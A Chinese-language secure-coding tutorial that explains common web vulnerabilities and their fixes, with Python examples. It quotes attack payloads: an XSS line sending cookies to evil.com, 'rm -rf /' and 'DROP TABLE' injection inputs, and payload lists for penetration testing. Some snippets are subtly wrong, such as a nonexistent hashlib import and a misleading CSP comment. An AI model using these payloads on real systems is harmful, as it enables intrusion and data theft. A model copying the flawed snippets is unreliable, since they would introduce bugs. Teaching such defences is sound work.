【安全】代码安全审计与防护实践
前言
在当今数字化时代,软件安全的重要性日益凸显。从Equifax数据泄露到Log4Shell漏洞,从SQL注入到XSS攻击,安全事件频发,给企业和用户带来了巨大的损失。作为一名AI程序员,我们编写的代码不仅需要功能正确,更需要安全可靠。代码安全不仅是安全工程师的责任,每一位开发者都应该具备安全意识和基本的防护能力。
本文将从实际工作场景出发,系统性地介绍代码安全审计的方法论、常见漏洞的原理与防护措施,以及如何在开发过程中融入安全实践。通过学习本文,读者将能够识别常见的安全漏洞、理解其危害程度,并掌握相应的防护技术。
一、安全审计基础
1.1 安全审计的概念与重要性
安全审计是对代码、系统或应用程序进行系统性检查,以发现潜在的安全漏洞和风险。与功能测试不同,安全审计关注的是"代码是否可能被恶意利用",而不是"功能是否符合预期"。
python
# 安全审计 vs 功能测试的区别
# 功能测试:验证功能正确性
def test_login():
user = authenticate("alice", "password123")
assert user is not None # 功能正确
# 安全审计:发现问题
def audit_login():
# 审计点1:是否使用了参数化查询防止SQL注入?
# 审计点2:密码是否正确哈希存储?
# 审计点3:登录失败是否有频率限制?
# 审计点4:session管理是否安全?
pass1.2 OWASP Top 10
OWASP(Open Web Application Security Project)定期发布的OWASP Top 10是Web应用安全领域最权威的风险指南:
python
# OWASP Top 10 (2021)
# 1. Broken Access Control - 访问控制失效
# 2. Cryptographic Failures - 加密失败
# 3. Injection - 注入攻击
# 4. Insecure Design - 不安全设计
# 5. Security Misconfiguration - 安全配置错误
# 6. Vulnerable and Outdated Components - 易受攻击的组件
# 7. Identification and Authentication Failures - 身份识别失败
# 8. Software and Data Integrity Failures - 软件和数据完整性失败
# 9. Security Logging and Monitoring Failures - 安全日志和监控失败
# 10. SSRF (Server-Side Request Forgery) - 服务器端请求伪造1.3 安全编码原则
python
# 安全编码基本原则
# 1. 最小权限原则
# 只授予程序完成任务所需的最小权限
def get_user_data(user_id):
# 只查询必要的数据,不要SELECT *
query = "SELECT id, name, email FROM users WHERE id = ?"
return db.execute(query, (user_id,))
# 2. 纵深防御原则
# 多层安全防护,即使一层被突破也有其他层保护
def process_payment(amount, card_token):
# 第一层:验证token有效性
if not validate_token(card_token):
raise AuthenticationError()
# 第二层:验证金额合理性
if amount > MAX_SINGLE_TRANSACTION:
raise ValueError()
# 第三层:记录审计日志
log_payment_attempt(amount)
# 第四层:调用支付网关
return payment_gateway.charge(amount, card_token)
# 3. 输入验证原则
# 永远不要信任用户输入
def validate_user_input(data):
# 白名单验证
if not isinstance(data.get('email'), str):
return False
if not re.match(r'^[\w\.]+@[\w\.]+$', data['email']):
return False
return True
# 4. 失败安全原则
# 默认情况下应该拒绝访问
def check_permission(user, resource):
# 默认 deny
if not user.is_authenticated:
return False
# 显式检查权限
if not resource in user.allowed_resources:
return False
return True
# 5. 避免安全敏感信息泄露
def log_error(error):
# 不要记录敏感信息
logger.error(f"Error occurred: {error.__class__.__name__}")
# 而不是: logger.error(f"Error: {error}") 可能包含密码二、常见Web漏洞与防护
2.1 SQL注入
SQL注入是最常见也最危险的安全漏洞之一,攻击者通过在用户输入中注入恶意SQL代码,可以完全控制数据库。
python
# 不安全的代码 - 存在SQL注入漏洞
def get_user_by_name(username):
# 危险!直接拼接SQL
query = f"SELECT * FROM users WHERE username = '{username}'"
return db.execute(query)
# 攻击示例
# 用户输入: admin' OR '1'='1
# 实际执行的SQL: SELECT * FROM users WHERE username = 'admin' OR '1'='1'
# 这会返回所有用户!
# 更严重的攻击
# 用户输入: '; DROP TABLE users; --
# 可能导致数据表被删除
# 安全的代码 - 使用参数化查询
def get_user_by_name_safe(username):
# 使用占位符,参数会被正确转义
query = "SELECT * FROM users WHERE username = %s"
return db.execute(query, (username,))
# ORM方式(更安全)
def get_user_by_name_orm(username):
return User.query.filter_by(username=username).first()
# Django ORM
def get_user_django(username):
return User.objects.get(username=username)
# SQLAlchemy ORM
def get_user_sqlalchemy(username):
return session.query(User).filter_by(username=username).first()
# 列表查询的IN子句
def get_users_by_ids(user_ids):
# 安全:参数化查询处理列表
placeholders = ','.join(['%s'] * len(user_ids))
query = f"SELECT * FROM users WHERE id IN ({placeholders})"
return db.execute(query, tuple(user_ids))
# 禁止使用字符串拼接构建SQL语句
# 错误示例:
query = "SELECT * FROM users WHERE " + condition # 危险!2.2 跨站脚本攻击(XSS)
XSS攻击允许攻击者在受害者浏览器中执行恶意脚本代码。
python
# 存储型XSS示例
# 用户提交的内容被存储并在其他用户访问时执行
# 不安全的代码
def post_comment(author, content):
# 直接存储用户输入
query = "INSERT INTO comments (author, content) VALUES (%s, %s)"
db.execute(query, (author, content))
def get_comments():
# 直接输出到HTML,没有转义
comments = db.execute("SELECT * FROM comments")
html = "<ul>"
for comment in comments:
html += f"<li>{comment['content']}</li>" # 危险!
html += "</ul>"
return html
# 攻击者可以提交:
# <script>document.location='http://evil.com/steal?c='+document.cookie</script>
# 当其他用户查看评论时,cookie会被发送到攻击者服务器
# 安全代码
from markupsafe import escape
def get_comments_safe():
comments = db.execute("SELECT * FROM comments")
html = "<ul>"
for comment in comments:
# HTML转义
escaped_content = escape(comment['content'])
html += f"<li>{escaped_content}</li>"
html += "</ul>"
return html
# Django模板自动转义
# 在Django模板中,{{ comment.content }} 会自动转义
# React自动转义
# JSX中 {comment.content} 也会自动转义
# Content Security Policy (CSP)
def add_csp_header():
"""添加CSP响应头"""
response.headers['Content-Security-Policy'] = "default-src 'self'; script-src 'self' 'unsafe-inline'"
# 这可以阻止内联脚本执行
return response
# HttpOnly Cookie
# 防止JavaScript访问cookie
def set_secure_cookie():
response.set_cookie(
'session_id',
session_id,
httponly=True, # 禁止JS访问
secure=True, # 只在HTTPS传输
samesite='Lax' # CSRF保护
)2.3 跨站请求伪造(CSRF)
CSRF攻击利用用户已登录的身份,在用户不知情的情况下执行恶意操作。
python
# CSRF攻击原理
# 1. 用户登录银行网站A,cookie被浏览器保存
# 2. 用户访问恶意网站B
# 3. 网站B中隐藏的表单自动提交到银行A的转账接口
# 4. 浏览器会自动带上银行A的cookie
# 5. 银行A验证cookie后执行转账操作
# 不安全的代码
@app.route('/transfer', methods=['POST'])
def transfer():
to_account = request.form['to']
amount = request.form['amount']
# 直接执行转账,没有验证请求来源
bank.transfer(to_account, amount)
return "Transfer complete"
# 安全代码 - CSRF Token
from flask_wtf import FlaskForm
from wtforms import SubmitField
class TransferForm(askForm):
to_account = StringField('To Account')
amount = DecimalField('Amount')
submit = SubmitField('Transfer')
@app.route('/transfer', methods=['GET', 'POST'])
def transfer():
form = TransferForm()
if form.validate_on_submit():
# Flask-WTF自动验证CSRF token
bank.transfer(form.to_account.data, form.amount.data)
return "Transfer complete"
return render_template('transfer.html', form=form)
# 手动实现CSRF保护
import secrets
# 生成CSRF token
def generate_csrf_token():
if 'csrf_token' not in session:
session['csrf_token'] = secrets.token_hex(32)
return session['csrf_token']
# 验证CSRF token
def verify_csrf_token(token):
stored = session.get('csrf_token')
if not stored or not token:
return False
# 使用constant-time比较防止时序攻击
return secrets.compare_digest(stored, token)
@app.route('/transfer', methods=['POST'])
def transfer():
if not verify_csrf_token(request.form.get('csrf_token')):
abort(403)
# 执行转账
return "Transfer complete"
# 验证请求来源
def verify_origin():
"""验证请求来源"""
if request.method == 'POST':
origin = request.headers.get('Origin')
referer = request.headers.get('Referer')
if origin and origin != request.url_root:
abort(403)
if referer and not referer.startswith(request.url_root):
abort(403)2.4 命令注入
命令注入允许攻击者在服务器上执行任意系统命令。
python
import subprocess
# 危险!用户输入直接拼接到命令中
def ping_unsafe(ip_address):
# 攻击者输入: 8.8.8.8; rm -rf /
cmd = f"ping -c 1 {ip_address}"
result = subprocess.run(cmd, shell=True, capture_output=True)
return result.stdout
# 安全代码 - 使用列表形式
def ping_safe(ip_address):
# subprocess.run 不使用 shell=True
cmd = ['ping', '-c', '1', ip_address]
result = subprocess.run(cmd, capture_output=True, text=True)
return result.stdout
# 使用shlex进行输入验证
import shlex
def ping_validated(ip_address):
# 先验证IP格式
import re
if not re.match(r'^[\d.]+$', ip_address):
raise ValueError("Invalid IP address")
cmd = ['ping', '-c', '1', ip_address]
result = subprocess.run(cmd, capture_output=True, text=True)
return result.stdout
# 绝对禁止使用 shell=True
# subprocess.run('ls ' + user_input, shell=True) # 危险!
# subprocess.run(['ls', user_input]) # 安全2.5 文件上传漏洞
python
import os
from werkzeug.utils import secure_filename
# 不安全的文件上传
@app.route('/upload', methods=['POST'])
def upload_unsafe():
file = request.files['file']
# 危险!直接保存文件
file.save(f'/uploads/{file.filename}')
return "File uploaded"
# 攻击者可以上传:
# shell.php -> 访问 /uploads/shell.php 执行任意代码
# ../../../etc/passwd -> 覆盖系统文件
# 安全代码
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['POST'])
def upload_safe():
file = request.files['file']
if file.filename == '':
return "No file selected", 400
if not allowed_file(file.filename):
return "File type not allowed", 400
# 使用secure_filename清理文件名
filename = secure_filename(file.filename)
# 生成随机文件名
import uuid
filename = f"{uuid.uuid4().hex}.{filename.rsplit('.', 1)[1]}"
# 保存到受控目录
filepath = os.path.join('/secure/uploads', filename)
file.save(filepath)
# 设置文件权限
os.chmod(filepath, 0o644)
# 验证文件内容(检查文件头)
if not verify_file_content(filepath):
os.remove(filepath)
return "Invalid file content", 400
return f"File uploaded: {filename}"
def verify_file_content(filepath):
"""验证文件内容是否为允许的类型"""
allowed_magic = {
'png': b'\x89PNG\r\n\x1a\n',
'jpg': b'\xff\xd8\xff',
'gif': b'GIF87a',
}
with open(filepath, 'rb') as f:
header = f.read(8)
for ext, magic in allowed_magic.items():
if header.startswith(magic):
return True
return False三、身份认证与授权
3.1 密码存储
python
import bcrypt
import hashlib
import secrets
# 绝对禁止明文存储密码!
# 错误示例
def store_password_unsafe(password):
# 危险!密码被明文存储
db.execute("INSERT INTO users (password) VALUES (%s)", (password,))
# 安全示例 - 使用bcrypt
def hash_password(password):
"""安全哈希密码"""
salt = bcrypt.gensalt()
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed
def verify_password(password, hashed):
"""验证密码"""
return bcrypt.checkpw(password.encode('utf-8'), hashed)
# 密码哈希示例
def register_user(username, email, password):
# 密码哈希
password_hash = hash_password(password)
db.execute(
"INSERT INTO users (username, email, password_hash) VALUES (%s, %s, %s)",
(username, email, password_hash)
)
def login_user(username, password):
user = db.execute("SELECT * FROM users WHERE username = %s", (username,))
if user and verify_password(password, user['password_hash']):
# 创建session
return create_session(user['id'])
return None
# 其他安全的哈希算法
import argon2
import hashlib.pbkdf2
# Argon2 (推荐)
def hash_password_argon2(password):
return argon2.PasswordHasher().hash(password)
def verify_password_argon2(password, hash):
return argon2.PasswordHasher().verify(hash, password)
# PBKDF2 (NIST推荐)
def hash_password_pbkdf2(password):
salt = secrets.token_hex(32)
hash = hashlib.pbkdf2_hmac('sha256', password.encode(), salt.encode(), 100000)
return f"{salt}:{hash.hex()}"
def verify_password_pbkdf2(password, stored):
salt, hash_hex = stored.split(':')
hash = hashlib.pbkdf2_hmac('sha256', password.encode(), salt.encode(), 100000)
return secrets.compare_digest(hash.hex(), hash_hex)3.2 Session管理
python
import secrets
import hashlib
from datetime import datetime, timedelta
# 不安全的Session管理
SESSION_TIMEOUT = 30 * 60 # 30分钟
def create_session_unsafe(user_id):
"""不安全的session创建"""
session_id = str(user_id) # 危险!session_id可预测
return session_id
def create_session_secure(user_id):
"""安全的session创建"""
# 生成安全的随机session ID
session_id = secrets.token_urlsafe(64)
# 存储session数据
session_data = {
'user_id': user_id,
'created_at': datetime.now().isoformat(),
'ip_address': request.remote_addr,
'user_agent': request.headers.get('User-Agent')
}
# 将会话存储在服务器端
redis.setex(
f"session:{session_id}",
SESSION_TIMEOUT,
json.dumps(session_data)
)
return session_id
def validate_session(session_id):
"""验证session"""
session_data = redis.get(f"session:{session_id}")
if not session_data:
return None
session = json.loads(session_data)
# 验证客户端指纹
if session['ip_address'] != request.remote_addr:
# IP地址变更,可能是会话劫持
redis.delete(f"session:{session_id}")
return None
# 延长session有效期(滑动过期)
redis.expire(f"session:{session_id}", SESSION_TIMEOUT)
return session
# Session固定攻击防护
def refresh_session(session_id):
"""刷新session ID,防止session固定攻击"""
old_session = validate_session(session_id)
if not old_session:
return None
# 删除旧session
redis.delete(f"session:{session_id}")
# 创建新session
return create_session_secure(old_session['user_id'])3.3 访问控制
python
# 基于角色的访问控制(RBAC)
class Role:
ADMIN = 'admin'
USER = 'user'
GUEST = 'guest'
class Permission:
READ = 'read'
WRITE = 'write'
DELETE = 'delete'
ADMIN = 'admin'
# 权限映射
ROLE_PERMISSIONS = {
Role.ADMIN: [Permission.READ, Permission.WRITE, Permission.DELETE, Permission.ADMIN],
Role.USER: [Permission.READ, Permission.WRITE],
Role.GUEST: [Permission.READ],
}
def check_permission(user, permission):
"""检查用户是否有指定权限"""
user_role = user.get('role', Role.GUEST)
user_permissions = ROLE_PERMISSIONS.get(user_role, [])
return permission in user_permissions
# Flask装饰器实现
from functools import wraps
def require_permission(permission):
"""权限检查装饰器"""
def decorator(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if not current_user:
return "Login required", 401
if not check_permission(current_user, permission):
return "Permission denied", 403
return f(*args, **kwargs)
return decorated_function
return decorator
@app.route('/admin/delete-user')
@require_permission(Permission.DELETE)
def delete_user():
return "User deleted"
# 资源级权限检查
def check_resource_permission(user, resource, action):
"""检查用户对特定资源的权限"""
# 检查资源所有权
if resource.owner_id == user.id:
return True
# 检查用户角色权限
if check_permission(user, action):
return True
return False
@app.route('/documents/<int:doc_id>')
def view_document(doc_id):
doc = Document.query.get_or_404(doc_id)
if not check_resource_permission(current_user, doc, Permission.READ):
abort(403)
return render_template('document.html', doc=doc)四、数据安全
4.1 敏感数据处理
python
import re
# 敏感数据识别与脱敏
def mask_credit_card(card_number):
"""脱敏信用卡号"""
if not card_number or len(card_number) < 4:
return "****"
return "*" * (len(card_number) - 4) + card_number[-4:]
def mask_phone(phone):
"""脱敏手机号"""
if not phone or len(phone) < 7:
return "****"
return phone[:3] + "****" + phone[-4:]
def mask_email(email):
"""脱敏邮箱"""
if not email or '@' not in email:
return "****"
name, domain = email.split('@')
if len(name) <= 2:
masked_name = "*" * len(name)
else:
masked_name = name[0] + "*" * (len(name) - 2) + name[-1]
return f"{masked_name}@{domain}"
def mask_id_card(id_card):
"""脱敏身份证号"""
if not id_card or len(id_card) < 10:
return "****"
return id_card[:6] + "********" + id_card[-4:]
def mask_sensitive_data(data, fields):
"""通用敏感数据脱敏"""
import copy
masked = copy.deepcopy(data)
for field in fields:
if field in masked:
value = masked[field]
if field == 'credit_card':
masked[field] = mask_credit_card(value)
elif field == 'phone':
masked[field] = mask_phone(value)
elif field == 'email':
masked[field] = mask_email(value)
elif field == 'id_card':
masked[field] = mask_id_card(value)
return masked
# 日志中的敏感数据处理
def sanitize_for_log(data):
"""清理日志中的敏感信息"""
sensitive_keys = {'password', 'token', 'secret', 'api_key', 'credit_card'}
if isinstance(data, dict):
return {k: '***REDACTED***' if k.lower() in sensitive_keys else sanitize_for_log(v)
for k, v in data.items()}
elif isinstance(data, (list, tuple)):
return [sanitize_for_log(item) for item in data]
return data4.2 数据加密
python
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
import base64
import os
# 对称加密 - Fernet
def generate_key():
"""生成加密密钥"""
return Fernet.generate_key()
def encrypt_data(data, key):
"""加密数据"""
f = Fernet(key)
if isinstance(data, str):
data = data.encode()
encrypted = f.encrypt(data)
return base64.urlsafe_b64encode(encrypted).decode()
def decrypt_data(encrypted_data, key):
"""解密数据"""
f = Fernet(key)
encrypted = base64.urlsafe_b64decode(encrypted_data.encode())
return f.decrypt(encrypted).decode()
# 非对称加密 - RSA
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric import padding
def generate_rsa_keypair():
"""生成RSA密钥对"""
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
)
public_key = private_key.public_key()
# 序列化
private_pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)
public_pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
return private_pem, public_pem
def rsa_encrypt(data, public_key_pem):
"""RSA加密"""
public_key = serialization.load_pem_public_key(public_key_pem)
encrypted = public_key.encrypt(
data.encode(),
padding.PKCS1v15()
)
return base64.b64encode(encrypted).decode()
def rsa_decrypt(encrypted_data, private_key_pem):
"""RSA解密"""
private_key = serialization.load_pem_private_key(
private_key_pem,
password=None
)
encrypted = base64.b64decode(encrypted_data.encode())
decrypted = private_key.decrypt(
encrypted,
padding.PKCS1v15()
)
return decrypted.decode()
# 密钥派生
def derive_key_from_password(password, salt=None):
"""从密码派生密钥"""
if salt is None:
salt = os.urandom(16)
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=100000,
)
key = base64.urlsafe_b64encode(kdf.derive(password.encode()))
return key, salt4.3 密钥管理最佳实践
python
# 密钥管理原则
# 1. 永远不要把密钥硬编码在代码中
# 2. 使用环境变量或密钥管理服务
# 3. 定期轮换密钥
# 4. 记录密钥的使用审计
import os
# 从环境变量获取密钥
def get_secret_key(key_name):
"""从环境变量获取密钥"""
key = os.environ.get(key_name)
if not key:
raise ValueError(f"Environment variable {key_name} not set")
return key
# 使用AWS KMS
# import boto3
# kms = boto3.client('kms')
# response = kms.encrypt(KeyId='key-id', Plaintext=password)
# encrypted_password = response['CiphertextBlob']
# 使用HashiCorp Vault
# import hvac
# client = hvac.Client(url='https://vault.example.com')
# client.token = 'token'
# secret = client.secrets.kv.v2.read_secret_version(path='my-secret')
# Python代码中的密钥管理示例
class KeyManager:
"""密钥管理器"""
def __init__(self):
self.encryption_key = self._load_key()
def _load_key(self):
"""从安全存储加载密钥"""
# 优先从环境变量
key = os.environ.get('ENCRYPTION_KEY')
if key:
return key.encode()
# 或者从密钥文件(权限设置为600)
key_file = '/run/secrets/encryption_key'
if os.path.exists(key_file):
with open(key_file, 'rb') as f:
return f.read()
raise ValueError("No encryption key available")
def rotate_key(self):
"""轮换密钥"""
# 生成新密钥
new_key = Fernet.generate_key()
# 用新密钥重新加密所有数据
# 这个过程需要:
# 1. 解密所有数据(用旧密钥)
# 2. 重新加密(用新密钥)
# 3. 更新密钥存储
pass五、安全测试
5.1 静态代码分析
bash
# 使用安全工具进行静态分析
# Bandit - Python代码安全分析
pip install bandit
bandit -r ./src
# 输出示例
# Issue: [Medium: HardcodedPassword] Severity: Medium
# Confidence: High
# File: src/config.py
# Line: 15
# Code: password = "admin123"
# Pylint - 代码质量检查
pip install pylint
pylint ./src
# Safety - 依赖漏洞检查
pip install safety
safety check
# Semgrep - 语义代码分析
# 安装:https://semgrep.dev/install
semgrep --config=auto ./src5.2 渗透测试基础
python
# 常见渗透测试工具
# SQL注入测试
SQL_INJECTION_PAYLOADS = [
"' OR '1'='1",
"' OR '1'='1' --",
"' OR '1'='1' /*",
"admin' --",
"admin' #",
"' UNION SELECT NULL--",
"1' AND '1'='1",
]
# XSS测试
XSS_PAYLOADS = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"javascript:alert('XSS')",
"<iframe src=javascript:alert('XSS')>",
]
# 命令注入测试
CMD_INJECTION_PAYLOADS = [
"; ls",
"| ls",
"& ls",
"`ls`",
"$(ls)",
]
def test_sql_injection(url):
"""测试SQL注入"""
for payload in SQL_INJECTION_PAYLOADS:
response = requests.get(
f"{url}/search",
params={'q': payload}
)
# 检测是否成功注入
if 'error' not in response.text.lower():
continue
if 'sql' in response.text.lower():
print(f"SQL Injection found: {payload}")
if 'mysql' in response.text.lower():
print(f"MySQL detected: {payload}")
def test_xss(url):
"""测试XSS"""
for payload in XSS_PAYLOADS:
response = requests.post(
f"{url}/comment",
data={'content': payload}
)
if payload in response.text:
print(f"XSS vulnerability found: {payload}")5.3 安全自动化测试
python
import pytest
from unittest.mock import Mock
from security import (
hash_password, verify_password,
validate_input, sanitize_for_log
)
class TestAuthentication:
"""认证安全测试"""
def test_password_hashing(self):
"""测试密码哈希"""
password = "SecureP@ssw0rd!"
hashed = hash_password(password)
# 哈希值不应该等于原文
assert hashed != password
# 相同密码每次哈希应该不同(因为随机盐)
hashed2 = hash_password(password)
assert hashed != hashed2
def test_password_verification(self):
"""测试密码验证"""
password = "SecureP@ssw0rd!"
hashed = hash_password(password)
assert verify_password(password, hashed) is True
assert verify_password("WrongPassword", hashed) is False
class TestInputValidation:
"""输入验证测试"""
def test_sql_injection_prevention(self):
"""测试SQL注入防护"""
malicious_input = "' OR '1'='1"
# 验证函数应该拒绝或转义
validated = validate_input(malicious_input, 'sql')
assert "' OR" not in validated or len(validated) < len(malicious_input)
def test_xss_prevention(self):
"""测试XSS防护"""
malicious_input = "<script>alert('XSS')</script>"
validated = validate_input(malicious_input, 'html')
assert '<script>' not in validated
class TestDataSanitization:
"""数据清理测试"""
def test_log_sanitization(self):
"""测试日志脱敏"""
log_data = {
'user': 'alice',
'password': 'secret123', # 敏感字段
'action': 'login'
}
sanitized = sanitize_for_log(log_data)
# 密码应该被脱敏
assert sanitized['password'] == '***REDACTED***'
assert sanitized['user'] == 'alice'
# 安全配置测试
class TestSecurityConfiguration:
"""安全配置测试"""
def test_session_timeout(self):
"""测试会话超时"""
from config import SESSION_TIMEOUT
assert SESSION_TIMEOUT <= 30 * 60 # 不应超过30分钟
def test_password_minimum_length(self):
"""测试密码最小长度"""
from config import PASSWORD_MIN_LENGTH
assert PASSWORD_MIN_LENGTH >= 8
def test_allowed_upload_extensions(self):
"""测试允许的上传扩展名"""
from config import ALLOWED_EXTENSIONS
# 不应该允许可执行文件
assert 'php' not in ALLOWED_EXTENSIONS
assert 'exe' not in ALLOWED_EXTENSIONS
assert 'sh' not in ALLOWED_EXTENSIONS六、安全运营与监控
6.1 安全日志
python
import logging
from datetime import datetime
import json
class SecurityLogger:
"""安全日志记录器"""
def __init__(self):
self.logger = logging.getLogger('security')
self.logger.setLevel(logging.INFO)
# 添加文件处理器
handler = logging.FileHandler('/var/log/security.log')
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - %(message)s'
)
handler.setFormatter(formatter)
self.logger.addHandler(handler)
def log_login_attempt(self, username, success, ip_address, user_agent):
"""记录登录尝试"""
self.logger.info(json.dumps({
'event': 'login_attempt',
'username': username,
'success': success,
'ip_address': ip_address,
'user_agent': user_agent,
'timestamp': datetime.now().isoformat()
}))
def log_access_denied(self, user_id, resource, action, ip_address):
"""记录访问拒绝"""
self.logger.warning(json.dumps({
'event': 'access_denied',
'user_id': user_id,
'resource': resource,
'action': action,
'ip_address': ip_address,
'timestamp': datetime.now().isoformat()
}))
def log_suspicious_activity(self, description, details):
"""记录可疑活动"""
self.logger.error(json.dumps({
'event': 'suspicious_activity',
'description': description,
'details': details,
'timestamp': datetime.now().isoformat()
}))
def log_data_access(self, user_id, data_type, record_count):
"""记录数据访问"""
self.logger.info(json.dumps({
'event': 'data_access',
'user_id': user_id,
'data_type': data_type,
'record_count': record_count,
'timestamp': datetime.now().isoformat()
}))
# 使用示例
security_logger = SecurityLogger()
def login_view(request):
username = request.form['username']
password = request.form['password']
if authenticate(username, password):
security_logger.log_login_attempt(
username, True,
request.remote_addr,
request.headers.get('User-Agent')
)
return "Login successful"
else:
security_logger.log_login_attempt(
username, False,
request.remote_addr,
request.headers.get('User-Agent')
)
return "Login failed"6.2 异常行为检测
python
from collections import defaultdict
from datetime import datetime, timedelta
import re
class AnomalyDetector:
"""异常行为检测器"""
def __init__(self):
# 登录失败计数
self.failed_logins = defaultdict(list)
# 请求频率计数
self.request_counts = defaultdict(list)
# IP黑名单
self.ip_blacklist = set()
def check_failed_login(self, ip_address, username):
"""检测暴力登录"""
now = datetime.now()
self.failed_logins[ip_address].append(now)
# 清理超过15分钟的记录
cutoff = now - timedelta(minutes=15)
self.failed_logins[ip_address] = [
t for t in self.failed_logins[ip_address] if t > cutoff
]
# 超过5次失败,视为暴力攻击
if len(self.failed_logins[ip_address]) > 5:
self.ip_blacklist.add(ip_address)
return True
return False
def check_request_rate(self, ip_address, endpoint):
"""检测请求频率异常"""
key = f"{ip_address}:{endpoint}"
now = datetime.now()
self.request_counts[key].append(now)
# 清理超过1分钟的记录
cutoff = now - timedelta(minutes=1)
self.request_counts[key] = [
t for t in self.request_counts[key] if t > cutoff
]
# 超过100次/分钟,视为爬虫或攻击
if len(self.request_counts[key]) > 100:
return True
return False
def is_ip_blacklisted(self, ip_address):
"""检查IP是否在黑名单"""
return ip_address in self.ip_blacklist
def detect_sql_injection_pattern(self, request_params):
"""检测SQL注入模式"""
sql_patterns = [
r"(\bUNION\b|\bSELECT\b|\bINSERT\b|\bDELETE\b)",
r"(\bOR\b.*=.*\bOR\b)",
r"(--|\#|\/\*)",
r"(\bEXEC\b|\bEXECUTE\b)",
]
for value in request_params.values():
if not isinstance(value, str):
continue
for pattern in sql_patterns:
if re.search(pattern, value, re.IGNORECASE):
return True
return False
# 使用示例
detector = AnomalyDetector()
@app.before_request
def security_check():
ip = request.remote_addr
# 检查IP黑名单
if detector.is_ip_blacklisted(ip):
abort(403)
# 检测请求频率
if detector.check_request_rate(ip, request.endpoint):
abort(429) # Too Many Requests
# 检测SQL注入
if detector.detect_sql_injection_pattern(request.args):
security_logger.log_suspicious_activity(
'SQL injection attempt',
{'ip': ip, 'path': request.path, 'params': dict(request.args)}
)
abort(400)七、安全开发实践
7.1 安全开发生命周期
┌─────────────────────────────────────────────────────────────┐
│ 安全开发生命周期 (SDL) │
├─────────────────────────────────────────────────────────────┤
│ 需求分析 ──▶ 设计 ──▶ 编码 ──▶ 测试 ──▶ 部署 ──▶ 维护 │
│ │ │ │ │ │ │ │
│ ▼ ▼ ▼ ▼ ▼ ▼ │
│ 安全需求 安全设计 安全 安全 安全 漏洞 │
│ 分析 评审 编码 测试 配置 修复 │
│ 规范 扫描 │
└─────────────────────────────────────────────────────────────┘7.2 依赖安全管理
bash
# Python依赖安全检查
# pip-audit
pip install pip-audit
pip-audit
# Safety检查
pip install safety
safety check
# 使用requirements.txt锁定版本
pip freeze > requirements.txt
# 定期更新依赖
pip list --outdated
# Dependabot(GitHub自动更新)
# .github/dependabot.yml
# version: 2
# updates:
# - package-ecosystem: "pip"
# directory: "/"
# schedule:
# interval: "weekly"7.3 安全配置检查清单
python
# Flask安全配置检查清单
def configure_flask_security(app):
"""Flask安全配置"""
# 1. 开启调试模式的生产环境应该关闭
if not app.config['DEBUG']:
app.config['DEBUG'] = False
# 2. 设置SECRET_KEY
app.config['SECRET_KEY'] = os.environ.get('SECRET_KEY')
# 3. Session配置
app.config['SESSION_COOKIE_HTTPONLY'] = True # 禁止JS访问
app.config['SESSION_COOKIE_SECURE'] = True # 仅HTTPS
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax' # CSRF保护
# 4. CORS配置
# cors.init_app(app, origins=['https://example.com'])
# 5. 限流配置
# from flask_limiter import Limiter
# limiter = Limiter(app, default_limits=["200 per day", "50 per hour"])
# 6. 安全头部
@app.after_request
def add_security_headers(response):
response.headers['X-Content-Type-Options'] = 'nosniff'
response.headers['X-Frame-Options'] = 'DENY'
response.headers['X-XSS-Protection'] = '1; mode=block'
response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
response.headers['Content-Security-Policy'] = "default-src 'self'"
return response
return app八、总结
代码安全是软件开发的重中之重,每一个开发者都应该具备安全意识和基本的防护能力。本文系统性地介绍了:
- 安全审计基础:理解OWASP Top 10和安全编码原则
- 常见Web漏洞:SQL注入、XSS、CSRF、命令注入、文件上传的原理与防护
- 身份认证与授权:安全的密码存储、Session管理、访问控制
- 数据安全:敏感数据处理、加密存储、密钥管理
- 安全测试:静态分析、渗透测试、自动化安全测试
- 安全运营:日志记录、异常检测、安全监控
安全不是一次性工作,而是贯穿软件全生命周期的持续过程。建议:
- 在开发早期引入安全考虑
- 定期进行安全审计和渗透测试
- 保持依赖更新,及时修补漏洞
- 建立安全事件响应机制
- 加强安全意识培训
希望本文能够帮助读者建立系统的安全知识体系,在实际工作中有效防范安全风险。